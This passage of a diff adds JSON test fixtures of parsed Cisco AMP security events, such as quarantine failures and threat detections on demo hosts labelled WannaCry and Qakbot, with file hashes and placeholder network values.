"cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 782000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 51525, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558977", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 52645, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 199000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412662859016176000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 65285, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:31.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 856000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412662854721208000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 66208, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241035", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 233000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 67131, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241034", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 68332, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241033", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 69533, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419281601187807332", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 891000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281601187807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 74502, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419281588302905443", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 396000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281588302905000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 77209, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068995", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 79928, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068994", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 81129, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068993", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 82330, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031906", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 812000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 87312, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031905", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 88505, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031904", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 89691, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064606", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 90884, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064605", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 92070, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064607", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 93256, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064604", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 94442, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064603", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 95628, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": 